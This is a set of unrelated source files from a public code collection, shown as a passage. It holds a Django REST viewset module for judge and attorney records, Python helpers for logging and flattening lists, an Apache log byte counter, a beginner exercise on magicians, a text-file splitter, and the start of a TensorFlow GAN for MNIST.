                .select_related("court")
                .only("pk", "court_id", "person_id")
                .order_by("-date_start"),
                to_attr="court_positions",
            ),
        )
        .only(
            "name_first",
            "name_middle",
            "name_last",
            "name_suffix",
            "has_photo",
            "date_dob",
            "date_granularity_dob",
            "slug",
        )
        .order_by("-id")
    )
    serializer_class = PersonDisclosureSerializer
    filterset_class = PersonDisclosureFilter
    pagination_class = TinyAdjustablePagination
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
        "name_last",
    )


class PersonViewSet(LoggingMixin, viewsets.ModelViewSet):
    """Full CRUD API for judges/people, with related objects prefetched."""

    queryset = (
        Person.objects.all()
        .prefetch_related(
            "positions",
            "educations",
            "political_affiliations",
            "sources",
            "aba_ratings",
            "race",
        )
        .order_by("-id")
    )
    serializer_class = PersonSerializer
    filterset_class = PersonFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
        "date_dob",
        "date_dod",
        "name_last",
    )


class PositionViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for judicial positions (nomination through termination)."""

    queryset = Position.objects.all().order_by("-id")
    serializer_class = PositionSerializer
    filterset_class = PositionFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
        "date_nominated",
        "date_elected",
        "date_recess_appointment",
        "date_referred_to_judicial_committee",
        "date_judicial_committee_action",
        "date_hearing",
        "date_confirmation",
        "date_start",
        "date_retirement",
        "date_termination",
    )


class RetentionEventViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for judicial retention events."""

    queryset = RetentionEvent.objects.all().order_by("-id")
    serializer_class = RetentionEventSerializer
    filterset_class = RetentionEventFilter
    ordering_fields = ("id", "date_created", "date_modified", "date_retention")


class EducationViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for a person's education records."""

    queryset = Education.objects.all().order_by("-id")
    serializer_class = EducationSerializer
    filterset_class = EducationFilter
    ordering_fields = ("id", "date_created", "date_modified")


class SchoolViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for schools referenced by education records."""

    queryset = School.objects.all().order_by("-id")
    serializer_class = SchoolSerializer
    filterset_class = SchoolFilter
    ordering_fields = ("id", "date_created", "date_modified", "name")


class PoliticalAffiliationViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for a person's political affiliations over time."""

    queryset = PoliticalAffiliation.objects.all().order_by("-id")
    serializer_class = PoliticalAffiliationSerializer
    filterset_class = PoliticalAffiliationFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
        "date_start",
        "date_end",
    )


class SourceViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for data sources backing person records."""

    queryset = Source.objects.all().order_by("-id")
    serializer_class = SourceSerializer
    filterset_class = SourceFilter
    ordering_fields = (
        "id",
        "date_modified",
        "date_accessed",
    )


class ABARatingViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for American Bar Association ratings."""

    queryset = ABARating.objects.all().order_by("-id")
    serializer_class = ABARatingSerializer
    filterset_class = ABARatingFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
        "year_rated",
    )


class PartyViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for case parties; read-only for RECAP users."""

    permission_classes = (RECAPUsersReadOnly,)
    serializer_class = PartySerializer
    filterset_class = PartyFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
    )
    # Prefetch nested criminal data and roles to avoid N+1 queries.
    queryset = Party.objects.prefetch_related(
        "party_types__criminal_counts",
        "party_types__criminal_complaints",
        "roles",
    ).order_by("-id")


class AttorneyViewSet(LoggingMixin, viewsets.ModelViewSet):
    """CRUD API for attorneys; read-only for RECAP users."""

    permission_classes = (RECAPUsersReadOnly,)
    serializer_class = AttorneySerializer
    filterset_class = AttorneyFilter
    ordering_fields = (
        "id",
        "date_created",
        "date_modified",
    )
    queryset = Attorney.objects.prefetch_related("roles").order_by("-id")
| freelawproject/courtlistener | cl/people_db/api_views.py | api_views.py | py | 6,404 | python | en | code | 435 | github-code | 13 |
22236145386 | from pathlib import Path
import collections
import colorlog
import copy
import logging
import sys
import numpy as np
# Layout shared by console and file handlers: timestamp with milliseconds,
# padded level name, source location, then the message.
LOG_FORMAT_STR = '%(asctime)s.%(msecs)03d %(levelname)-8s [%(filename)s:%(lineno) 5d] %(message)s'
LOG_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
# Colour per level name, consumed by colorlog.ColoredFormatter.
LOG_COLORS = {
    'DEBUG': 'green',
    'INFO': 'cyan',
    'WARNING': 'bold_yellow',
    'ERROR': 'bold_red',
    'CRITICAL': 'bold_purple'}
class Bunch(dict):
    """A subclass of dictionary with an additional dot syntax."""

    def __init__(self, *args, **kwargs):
        super(Bunch, self).__init__(*args, **kwargs)
        # Aliasing __dict__ to the mapping itself makes attribute access
        # (b.key) equivalent to item access (b['key']).
        self.__dict__ = self

    def copy(self, deep=False):
        """Return a new Bunch instance which is a copy of the current Bunch instance.

        Parameters
        ----------
        deep : bool
            If True perform a deep copy (see notes). By default a shallow copy is returned.

        Returns
        -------
        Bunch
            A new copy of the Bunch.

        Notes
        -----
        - A shallow copy constructs a new Bunch object and then (to the extent possible) inserts
          references into it to the objects found in the original.
        - A deep copy constructs a new Bunch and then, recursively, inserts copies into it of the
          objects found in the original.
        """
        return copy.deepcopy(self) if deep else Bunch(super(Bunch, self).copy())

    def save(self, npz_file, compress=False):
        """
        Saves a npz file containing the arrays of the bunch.

        :param npz_file: output file
        :param compress: bool (False) use compression
        :return: None
        """
        if compress:
            np.savez_compressed(npz_file, **self)
        else:
            np.savez(npz_file, **self)

    @staticmethod
    def load(npz_file):
        """
        Loads a npz file containing the arrays of the bunch.

        :param npz_file: output file
        :return: Bunch
        """
        if not Path(npz_file).exists():
            raise FileNotFoundError(f"{npz_file}")
        # np.load on a .npz returns a lazy NpzFile backed by an open file
        # handle; the previous implementation never closed it. Using it as
        # a context manager materialises the arrays into the Bunch and then
        # closes the handle.
        with np.load(npz_file) as data:
            return Bunch(data)
def _iflatten(x):
result = []
for el in x:
if isinstance(el, collections.abc.Iterable) and not (
isinstance(el, str) or isinstance(el, dict)):
result.extend(_iflatten(el))
else:
result.append(el)
return result
def _gflatten(x):
def iselement(e):
return not (isinstance(e, collections.abc.Iterable) and not (
isinstance(el, str) or isinstance(el, dict)))
for el in x:
if iselement(el):
yield el
else:
yield from _gflatten(el)
def flatten(x, generator=False):
    """
    Flatten a nested Iterable excluding strings and dicts.

    Converts nested Iterable into flat list. Will not iterate through strings or
    dicts.

    :param x: nested iterable to flatten
    :param generator: if True return a lazy generator instead of a list
    :return: Flattened list or generator object.
    :rtype: list or generator
    """
    return _gflatten(x) if generator else _iflatten(x)
def range_str(values: iter) -> str:
    """
    Given a list of integers, returns a terse string expressing the unique values.

    Example:
        indices = [0, 1, 2, 3, 4, 7, 8, 11, 15, 20]
        range_str(indices)
        >> '0-4, 7-8, 11, 15 & 20'

    :param values: An iterable of ints
    :return: A string of unique value ranges
    """
    trial_str = ''
    # Sort, don't just de-duplicate: the run detection below requires
    # ascending order, and set iteration order is an implementation detail
    # that merely tends to look sorted for small ints.
    values = sorted(set(values))
    for i in range(len(values)):
        if i == 0:
            trial_str += str(values[i])
        elif values[i] - (values[i - 1]) == 1:
            # Inside a consecutive run; emit "-end" only when the run ends.
            if i == len(values) - 1 or values[i + 1] - values[i] > 1:
                trial_str += f'-{values[i]}'
        else:
            trial_str += f', {values[i]}'

    # Replace final comma with an ampersand
    k = trial_str.rfind(',')
    if k > -1:
        trial_str = f'{trial_str[:k]} &{trial_str[k + 1:]}'
    return trial_str
def setup_logger(name='ibl', level=logging.NOTSET, file=None, no_color=False):
    """Set up a log for IBL packages.

    Uses date time, calling function and distinct colours for levels.
    Sets the name if not set already and add a stream handler.
    If the stream handler already exists, does not duplicate.
    The naming/level allows not to interfere with third-party libraries when setting level.

    Parameters
    ----------
    name : str
        Log name, should be set to the root package name for consistent logging throughout the app.
    level : str, int
        The logging level (defaults to NOTSET, which inherits the parent log level)
    file : bool, str, pathlib.Path
        If True, a file handler is added with the default file location, otherwise a log file path
        may be passed.
    no_color : bool
        If true the colour log is deactivated. May be useful when directing the std out to a file.

    Returns
    -------
    logging.Logger, logging.RootLogger
        The configured log.
    """
    log = logging.getLogger() if not name else logging.getLogger(name)
    log.setLevel(level)
    fkwargs = {'no_color': True} if no_color else {'log_colors': LOG_COLORS}
    # check existence of stream handlers before adding another
    # (handlers added here are tagged "<name>_auto" so re-runs are no-ops)
    if not any(map(lambda x: x.name == f'{name}_auto', log.handlers)):
        # need to remove any previous default Stream handler configured on stderr
        # to not duplicate output
        # NOTE(review): `h.stream` assumes every existing handler is a
        # StreamHandler; a NullHandler here would raise AttributeError —
        # confirm only stream handlers are expected at this point.
        for h in log.handlers:
            if h.stream.name == '<stderr>' and h.level == 0 and h.name is None:
                log.removeHandler(h)
        stream_handler = logging.StreamHandler(stream=sys.stdout)
        stream_handler.setFormatter(
            colorlog.ColoredFormatter('%(log_color)s' + LOG_FORMAT_STR,
                                      LOG_DATE_FORMAT, **fkwargs))
        stream_handler.name = f'{name}_auto'
        log.addHandler(stream_handler)
    # add the file handler if requested, but check for duplicates
    # (file handlers are tagged "<name>_file" by log_to_file)
    if not any(map(lambda x: x.name == f'{name}_file', log.handlers)):
        if file is True:
            log_to_file(log=name)
        elif file:
            log_to_file(filename=file, log=name)
    return log
def log_to_file(log='ibl', filename=None):
    """
    Save log information to a given filename in '.ibl_logs' folder (in home directory).

    Parameters
    ----------
    log : str, logging.Logger
        The log (name or object) to add file handler to.
    filename : str, Pathlib.Path
        The name of the log file to save to.

    Returns
    -------
    logging.Logger
        The log with the file handler attached.
    """
    if isinstance(log, str):
        log = logging.getLogger(log)
    # Default / relative filenames are placed under ~/.ibl_logs.
    if filename is None:
        filename = Path.home().joinpath('.ibl_logs', log.name)
    elif not Path(filename).is_absolute():
        filename = Path.home().joinpath('.ibl_logs', filename)
    # NOTE(review): mkdir without parents=True assumes the directory is at
    # most one level below an existing folder — true for the defaults above.
    filename.parent.mkdir(exist_ok=True)
    file_handler = logging.FileHandler(filename)
    file_format = logging.Formatter(LOG_FORMAT_STR, LOG_DATE_FORMAT)
    file_handler.setFormatter(file_format)
    # Tag the handler so setup_logger can detect and skip duplicates.
    file_handler.name = f'{log.name}_file'
    log.addHandler(file_handler)
    log.info(f'File log initiated {file_handler.name}')
    return log
6590126316 | # nongenlog.py
#
# Sum the total bytes transferred recorded in an Apache log file,
# using a plain for-loop (no generators).
import time

# Timing: time.clock() was removed in Python 3.8; perf_counter() is the
# documented replacement for measuring elapsed time.
time_start = time.perf_counter()

total = 0
# The context manager guarantees the log file is closed even on error.
with open("big-access-log") as wwwlog:
    for line in wwwlog:
        # rsplit(None, 1)[1]: the last whitespace-separated field of an
        # Apache access-log line is the response size in bytes, or '-'
        # when no body was sent.
        bytestr = line.rsplit(None, 1)[1]
        if bytestr != '-':
            total += int(bytestr)

# Timing
time_cost = time.perf_counter() - time_start
print("共计 %d Bytes | 共计耗时 %s s" % (total, time_cost))
| lazzman/PythonLearn | Python3_Learn/生成器与协程专题[www.dabeaz.com]/生成器/generators_py3/2 Processing Data Files/nongenlog.py | nongenlog.py | py | 901 | python | zh | code | 4 | github-code | 13 |
3836827733 | def show_magicians(magicians):
"""Prints a list of magician's names."""
for magician in magicians:
print(magician)
def make_great(magicians):
    """Adds "the Great" to the end of each magician's name."""
    # Drain the incoming list from the back, titling each name as it goes;
    # the list therefore ends up in reverse of its original order.
    honored = []
    while magicians:
        honored.append(magicians.pop() + ' the Great')
    magicians.extend(honored)
magicians = ['Harry Houdini', 'David Copperfield', 'David Blaine']
show_magicians(magicians)
print("\n")

# make_great empties and refills the list, so the names print back in
# reverse order with the title appended.
make_great(magicians)
show_magicians(magicians)
| jodr5786/Python-Crash-Course | Chapter 8/8-10_Great_Magicians.py | 8-10_Great_Magicians.py | py | 677 | python | en | code | 0 | github-code | 13 |
41513320121 | #!/usr/bin/env python3
from pathlib import Path
import pathlib
import tempfile
def print_mult(x, MAX):
    """Print the divisors of *x* greater than 1 and return them sorted.

    Collection stops once more than MAX divisors have been gathered, so
    very composite numbers don't flood the prompt.

    :param x: total number of lines in the file being split
    :param MAX: soft cap on how many suggestions to gather
    :return: sorted list of the collected divisors (previously returned
        None; returning them is backward-compatible and makes the helper
        testable/reusable)
    """
    count = 0
    divisors = set()
    for candidate in range(2, x + 1):
        if x % candidate == 0:
            count += 1
            divisors.add(candidate)
        if count > MAX:
            break
    # Keep the original console output (a set literal) for the interactive
    # prompt, but also hand the sorted values back to callers.
    print(divisors)
    return sorted(divisors)
def partitions(reading_stream, select, ftmp, totlines):
    """Count the usable lines and interactively ask for a partition count
    that divides them evenly.

    :param reading_stream: open handle of the source file
    :param select: 'y' to drop whitespace-only lines (kept lines are copied
        into *ftmp*), 'n' to count every line
    :param ftmp: writable temp file, used only when select == 'y'
    :param totlines: running line count (callers pass 0)
    :return: tuple (part, totlines)
    """
    # looking how many lines are
    for line in reading_stream:
        if(select == 'y' and not(line.isspace())):
            ftmp.write(line)
            totlines += 1
        elif(select == 'n'):
            totlines += 1
    if(select == 'y'):
        ftmp.seek(0, 0)
    MAX = 15  # maximum number of suggested partitions
    print("Found " + str(totlines) + " lines.")
    print("\nHere you are some suggested legit partition size\\s to use: ")
    print_mult(totlines, MAX)
    part = int(input("\nIn how many partitions do you want to split the file? "))
    # NOTE(review): `part > totlines != 0` is a chained comparison, i.e.
    # (part > totlines) and (totlines != 0) — presumably intentional so an
    # empty file skips this check; confirm.
    if(part > totlines != 0):
        print("Error: partitions greater than totlines!")
        quit()
    # Partitions must divide the line count exactly so every file gets the
    # same number of lines.
    if(totlines % part != 0):
        print("Error: partitions number has to be a multiple of your total file lines!")
        quit()
    return part, totlines
def inputf():
    """Prompt for the source file name and the whitespace-filter option.

    :return: tuple (select, reading_stream, noext_filename, ext, ftmp)
        where *ftmp* is a text-mode temporary file when select == 'y',
        otherwise False.
    """
    print("Remember to add file extension (.log, .txt..) ")
    src_filename = input("file name: ")
    reading_stream = open(src_filename, "r")
    select = input(
        "Would you like to exclude whitespaces\\whitelines?\nSuggested 'y'\n[y\\n] ")
    if(not(select == 'y' or select == 'n')):
        print("Error")
        quit()
    # Build an absolute path so the extension-free stem can be derived.
    path = str(pathlib.Path().parent.absolute()) + "/" + src_filename
    noext_filename = Path(path).resolve().stem
    ext = str(pathlib.Path(src_filename).suffix)
    if(select == 'y'):
        # Whitespace-filtered lines will be staged in this temp file.
        ftmp = tempfile.TemporaryFile(mode='w+')
        return select, reading_stream, noext_filename, ext, ftmp
    else:
        return select, reading_stream, noext_filename, ext, False
def main():
    """Drive the splitter: gather input, then write each partition file.

    Fixes a NameError in the original: the inner line counter ``k`` was
    read (``while k < linestoprint``) before it was ever assigned, so the
    first partition crashed. Partition files are now also closed via
    ``with`` even if a write fails.
    """
    select, reading_stream, noext_filename, ext, ftmp = inputf()
    part, totlines = partitions(reading_stream, select, ftmp, 0)

    # Rewind both streams so copying starts from the first line.
    reading_stream.seek(0, 0)
    if select == 'y':
        ftmp.seek(0, 0)

    # When whitespace lines were filtered out, read from the temp file.
    source = ftmp if select == 'y' else reading_stream
    # partitions() guarantees an exact division.
    lines_per_part = totlines // part

    for cont in range(1, part + 1):
        progress = float(cont / part) * 100
        with open(noext_filename + "-part-" + str(cont) + ext, "w") as f:
            for _ in range(lines_per_part):
                f.write(str(source.readline()))
                print("Progress: " + "%2.f" % progress + "%")

    reading_stream.close()
    if select == 'y':
        ftmp.close()
    return


if(__name__ == "__main__"):
    main()
| mich2k/Text-Splitter | textsplitter.py | textsplitter.py | py | 2,821 | python | en | code | 1 | github-code | 13 |
38167656932 | #!/usr/bin/python
# -*- coding:utf-8 -*-
#冒泡排序法
import numpy as np
# Exchange sort
def bubble_sort(list):
    """Sort *list* in place (ascending) and return it.

    O(n**2) comparison sort: each outer pass fixes the smallest remaining
    element into position i by swapping out-of-order pairs.
    """
    n = len(list)
    for i in range(n):
        for j in range(i + 1, n):
            if list[i] > list[j]:
                list[i], list[j] = list[j], list[i]
    return list


test = np.array([2, 1, 6, 3, 9, 6, 0])
print(bubble_sort(test))
| Funail/webdriver | python_study/bubble_sort.py | bubble_sort.py | py | 357 | python | en | code | 0 | github-code | 13 |
5497055572 | from athena_helper import AthenaQuery
import boto3
import logging
# We can only really do an integration test of this
LOGGER = logging.getLogger()


def set_up_logging():
    """Attach a DEBUG-level console handler to the root logger and quiet
    the chattiest third-party loggers."""
    global LOGGER
    handler = logging.StreamHandler()
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    LOGGER.addHandler(handler)
    LOGGER.setLevel(logging.DEBUG)
    # SILENCE! AWS SDK internals log a lot at DEBUG; keep them at WARNING.
    for noisy in ('botocore', 'urllib3'):
        logging.getLogger(noisy).setLevel(logging.WARNING)
def main():
    """Integration-test the AthenaQuery helper end to end against AWS.

    Requires valid AWS credentials and network access, which is why this
    lives in a script rather than a unit test.
    """
    set_up_logging()
    LOGGER.debug("Begin test")
    boto_session = boto3.Session()

    # This is the default table
    query = "select * from elb_logs limit 1"
    database_name = "sampledb"

    # Build the name of the default Athena bucket
    account_id = boto_session.client('sts').get_caller_identity().get('Account')
    region = boto_session.region_name
    result_bucket = "s3://aws-athena-query-results-{}-{}/".format(account_id, region)

    LOGGER.info("Creating the Athena Query Object")
    my_query = AthenaQuery(query, database_name, result_bucket)
    LOGGER.info("Beginning query execution")
    query_execution_id = my_query.execute()

    LOGGER.info("Retrieving query results")
    # This will automatically wait for the query to execute
    # NOTE(review): query_results is unused — presumably fetched only to
    # exercise the call path; confirm no assertion was intended here.
    query_results = my_query.get_result()

    LOGGER.info("Constructing a new AthenaQuery object from the existing execution id")
    aq = AthenaQuery.from_execution_id(query_execution_id)
    LOGGER.info("Retrieving status information from the new object")
    aq.get_status_information()


if __name__ == "__main__":
    main()
| MauriceBrg/aws-blog.de-projects | sls-athena/test_athena_helper.py | test_athena_helper.py | py | 1,734 | python | en | code | 50 | github-code | 13 |
4321487831 | from financepy.utils.global_types import FinExerciseTypes
from financepy.utils.helpers import print_tree
from financepy.models.bdt_tree import BDTTree
from financepy.market.curves.discount_curve_zeros import DiscountCurveZeros
from financepy.utils.global_vars import gDaysInYear
from financepy.utils.day_count import DayCountTypes
from financepy.utils.frequency import FrequencyTypes
from financepy.models.black import Black
from financepy.products.rates.ibor_swaption import SwapTypes
from financepy.products.rates.ibor_swaption import IborSwaption
from financepy.products.bonds.bond import Bond
from financepy.market.curves.discount_curve_flat import DiscountCurveFlat
from financepy.market.curves.discount_curve import DiscountCurve
from financepy.utils.date import Date
import numpy as np
def test_BDTExampleTwo():
    """Pin bond-option values from a Black-Derman-Toy tree (Hull Fig 28.11).

    NOTE(review): the comment below says "European option" but
    FinExerciseTypes.AMERICAN is used further down — the pinned values are
    for American exercise; confirm which was intended.
    """
    # Valuation of a European option on a coupon bearing bond
    # This follows example in Fig 28.11 of John Hull's book (6th Edition)
    # but does not have the exact same dt so there are some differences
    settlement_date = Date(1, 12, 2019)
    issue_date = Date(1, 12, 2015)
    expiry_date = settlement_date.add_tenor("18m")
    maturity_date = settlement_date.add_tenor("10Y")
    coupon = 0.05
    freq_type = FrequencyTypes.SEMI_ANNUAL
    accrual_type = DayCountTypes.ACT_ACT_ICMA
    bond = Bond(issue_date, maturity_date, coupon, freq_type, accrual_type)

    # Build the coupon schedule as (time, amount) arrays measured in years
    # from settlement; the straddling coupon is included explicitly.
    coupon_times = []
    coupon_flows = []
    cpn = bond._coupon/bond._frequency
    num_flows = len(bond._coupon_dates)

    for i in range(1, num_flows):
        pcd = bond._coupon_dates[i-1]
        ncd = bond._coupon_dates[i]
        if pcd < settlement_date and ncd > settlement_date:
            flow_time = (pcd - settlement_date) / gDaysInYear
            coupon_times.append(flow_time)
            coupon_flows.append(cpn)

    for flow_date in bond._coupon_dates:
        if flow_date > settlement_date:
            flow_time = (flow_date - settlement_date) / gDaysInYear
            coupon_times.append(flow_time)
            coupon_flows.append(cpn)

    coupon_times = np.array(coupon_times)
    coupon_flows = np.array(coupon_flows)

    strike_price = 105.0
    face = 100.0

    tmat = (maturity_date - settlement_date) / gDaysInYear
    texp = (expiry_date - settlement_date) / gDaysInYear
    times = np.linspace(0, tmat, 11)
    dates = settlement_date.add_years(times)
    # Flat 5% continuously-compounded curve.
    dfs = np.exp(-0.05*times)
    curve = DiscountCurve(settlement_date, dates, dfs)

    price = bond.clean_price_from_discount_curve(settlement_date, curve)
    assert round(price, 4) == 99.5420

    sigma = 0.20

    # Test convergence
    num_time_steps = 5
    exercise_type = FinExerciseTypes.AMERICAN

    model = BDTTree(sigma, num_time_steps)
    model.build_tree(tmat, times, dfs)
    v = model.bond_option(texp, strike_price,
                          face, coupon_times, coupon_flows, exercise_type)

    assert round(v['call'], 4) == 0.5043
    assert round(v['put'], 4) == 8.2242


def test_BDTExampleThree():
    """Pin Bermudan/European swaption values from a BDT tree.

    Follows Table 1 of Leif Andersen's paper (SSRN id155208): first a
    European 2y-into-4y case, then a Bermudan 5y-into-10y case.
    """
    # Valuation of a swaption as in Leif Andersen's paper - see Table 1 on
    # SSRN-id155208.pdf
    settlement_date = Date(1, 1, 2020)
    times = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])
    dates = settlement_date.add_years(times)
    rate = 0.06
    # Semi-annual compounding at 6%.
    dfs = 1.0 / (1.0 + rate/2.0)**(2.0*times)
    curve = DiscountCurve(settlement_date, dates, dfs)

    coupon = 0.06
    freq_type = FrequencyTypes.SEMI_ANNUAL
    accrual_type = DayCountTypes.ACT_ACT_ICMA
    strike_price = 100.0
    face = 100.0
    # Andersen paper
    num_time_steps = 200

    exercise_type = FinExerciseTypes.EUROPEAN
    years_to_maturity = 4.0
    expiryYears = 2.0

    maturity_date = settlement_date.add_years(years_to_maturity)
    issue_date = Date(maturity_date._d, maturity_date._m, 2000)

    sigma = 0.2012

    expiry_date = settlement_date.add_years(expiryYears)

    tmat = (maturity_date - settlement_date) / gDaysInYear
    texp = (expiry_date - settlement_date) / gDaysInYear

    bond = Bond(issue_date, maturity_date,
                coupon, freq_type, accrual_type)

    # Only coupons after expiry matter for the swaption underlying.
    coupon_times = []
    coupon_flows = []
    cpn = bond._coupon/bond._frequency
    for flow_date in bond._coupon_dates:
        if flow_date > expiry_date:
            flow_time = (flow_date - settlement_date) / gDaysInYear
            coupon_times.append(flow_time)
            coupon_flows.append(cpn)
    coupon_times = np.array(coupon_times)
    coupon_flows = np.array(coupon_flows)

    price = bond.clean_price_from_discount_curve(
        settlement_date, curve)

    model = BDTTree(sigma, num_time_steps)
    model.build_tree(tmat, times, dfs)

    v = model.bermudan_swaption(texp,
                                tmat,
                                strike_price,
                                face,
                                coupon_times,
                                coupon_flows,
                                exercise_type)

    assert round(price, 5) == 100.01832
    assert round(v['pay']*100, 2) == 0.00
    assert round(v['rec']*100, 2) == 8883.21

    # Second case: Bermudan exercise, 5y expiry into 10y maturity.
    exercise_type = FinExerciseTypes.BERMUDAN
    years_to_maturity = 10.0
    expiryYears = 5.0

    maturity_date = settlement_date.add_years(years_to_maturity)
    issue_date = Date(maturity_date._d, maturity_date._m, 2000)

    sigma = 0.1522

    expiry_date = settlement_date.add_years(expiryYears)

    tmat = (maturity_date - settlement_date) / gDaysInYear
    texp = (expiry_date - settlement_date) / gDaysInYear

    bond = Bond(issue_date, maturity_date,
                coupon, freq_type, accrual_type)

    coupon_times = []
    coupon_flows = []
    cpn = bond._coupon/bond._frequency
    for flow_date in bond._coupon_dates:
        if flow_date > expiry_date:
            flow_time = (flow_date - settlement_date) / gDaysInYear
            coupon_times.append(flow_time)
            coupon_flows.append(cpn)
    coupon_times = np.array(coupon_times)
    coupon_flows = np.array(coupon_flows)

    price = bond.clean_price_from_discount_curve(
        settlement_date, curve)

    model = BDTTree(sigma, num_time_steps)
    model.build_tree(tmat, times, dfs)

    v = model.bermudan_swaption(texp,
                                tmat,
                                strike_price,
                                face,
                                coupon_times,
                                coupon_flows,
                                exercise_type)

    assert round(price, 5) == 100.08625
    assert round(v['pay']*100, 2) == 263.28
    assert round(v['rec']*100, 2) == 7437.00
| domokane/FinancePy | tests/test_FinModelRatesBDT.py | test_FinModelRatesBDT.py | py | 6,568 | python | en | code | 1,701 | github-code | 13 |
42185177402 | def calc_percentage(lst):
sum = 0.0
per = 0.0
for x in lst:
sum += float(x) #sum=sum+x
per = sum/len(lst)
return per
def sort_list(lst):
    """Sort *lst* of [first, last, percentage] rows in place, ascending by
    the percentage (index 2).

    Replaces the hand-written O(n**2) bubble sort with the built-in stable
    Timsort; rows with equal percentages keep their relative order under
    both implementations, so the result is identical.
    """
    lst.sort(key=lambda row: row[2])
#Read The file
file = open("practice.csv","r")
# NOTE(review): append mode means repeated runs keep adding to result2.txt —
# confirm accumulation is intended (otherwise open with "w").
result = open("result2.txt","a")
above60 = []
bet5060 = []
below50 = []
# Each CSV row is: first name, last name, then the individual marks.
# Bucket every student by their average percentage.
for line in file:
    line = line.strip()
    lst = line.split(",")
    per = calc_percentage(lst[2:])
    if(per>=60):
        above60.append([lst[0],lst[1],per])
    elif (per<60 and per>=50):
        bet5060.append([lst[0],lst[1],per])
    else:
        below50.append([lst[0],lst[1],per])
# Order each bucket ascending by percentage (index 2).
sort_list(above60)
sort_list(bet5060)
sort_list(below50)
result.write("\nTotal {} students scored more than or equal to 60%\n".format(len(above60)))
result.write("The Students Are: \n")
for x in above60:
    result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
# NOTE(review): unlike the first section, the next two headers lack a
# trailing newline before "The Students Are:" — confirm the run-together
# output is intended.
result.write("\nTotal {} students scored more than or equal to 50% and less than 60%".format(len(bet5060)))
result.write("The Students Are: \n")
for x in bet5060:
    result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
result.write("\nTotal {} students scored less than 50%".format(len(below50)))
result.write("The Students Are: \n")
for x in below50:
    result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
result.close()
file.close() | pythonchamps/pythonpractice | PercentageSeperate.py | PercentageSeperate.py | py | 1,465 | python | en | code | 0 | github-code | 13 |
263706306 | import mnist_utils as utils
import tensorflow as tf
import matplotlib.pyplot as plt
def create_generator(latent_dim):
    """Build the DCGAN generator: latent vector -> 28x28x1 image.

    Two UpSampling2D stages take the 7x7 feature map to 28x28; the final
    tanh squashes pixels into [-1, 1] — presumably matching the scaling in
    mnist_utils.create_dataset (confirm).

    :param latent_dim: length of the input noise vector
    :return: an uncompiled tf.keras Sequential model
    """
    model = tf.keras.models.Sequential()
    model.add(tf.keras.layers.InputLayer(input_shape=(latent_dim,)))
    model.add(tf.keras.layers.Dense(7 * 7 * 64, activation="relu"))
    model.add(tf.keras.layers.Reshape((7, 7, 64)))
    model.add(tf.keras.layers.UpSampling2D())
    model.add(tf.keras.layers.Conv2D(64, kernel_size=3, padding="same", activation=tf.keras.activations.relu))
    model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
    model.add(tf.keras.layers.UpSampling2D())
    model.add(tf.keras.layers.Conv2D(32, kernel_size=3, padding="same", activation=tf.keras.activations.relu))
    model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
    model.add(tf.keras.layers.Conv2D(1, kernel_size=3, padding="same", activation=tf.keras.activations.tanh))
    model.summary()
    return model


def create_discriminator():
    """Build the DCGAN discriminator: 28x28x1 image -> real/fake score.

    Strided convolutions downsample instead of pooling; the sigmoid output
    pairs with the BinaryCrossentropy loss used by the Gan trainer.

    :return: an uncompiled tf.keras Sequential model
    """
    model = tf.keras.models.Sequential()
    model.add(tf.keras.layers.InputLayer(input_shape=(28, 28, 1)))
    model.add(tf.keras.layers.Conv2D(32, kernel_size=3, strides=2, padding="same"))
    model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
    model.add(tf.keras.layers.Conv2D(64, kernel_size=3, strides=2, padding="same"))
    model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
    model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
    model.add(tf.keras.layers.Conv2D(128, kernel_size=3, strides=2, padding="same"))
    model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
    model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
    model.add(tf.keras.layers.Conv2D(256, kernel_size=3, strides=1, padding="same"))
    model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
    model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
    model.add(tf.keras.layers.Flatten())
    model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
    model.summary()
    return model
class Gan(object):
def __init__(self, epochs, batch_size, latent_dim, check_point_root, save_interval, log_dir):
if not tf.io.gfile.exists(check_point_root):
tf.io.gfile.makedirs(check_point_root)
self.check_point_root = check_point_root
if not tf.io.gfile.exists(log_dir):
tf.io.gfile.makedirs(log_dir)
self.log_dir = log_dir
self.epochs = epochs
self.batch_size = batch_size
self.latent_dim = latent_dim
self.save_interval = save_interval
ds_train, ds_test = utils.create_dataset(self.batch_size)
self.ds_train = ds_train
self.ds_test = ds_test
self.generator = create_generator(self.latent_dim)
self.discriminator = create_discriminator()
self.loss_obj = tf.keras.losses.BinaryCrossentropy()
self.generator_optimizer_obj = tf.keras.optimizers.Adam()
self.discriminator_optimizer_obj = tf.keras.optimizers.Adam()
self.metrics_obj = tf.keras.metrics.BinaryAccuracy()
self.check_point = tf.train.Checkpoint(
step=tf.Variable(0, dtype=tf.int32),
generator=self.generator,
discriminator=self.discriminator
)
self.check_point_manager = tf.train.CheckpointManager(checkpoint=self.check_point,
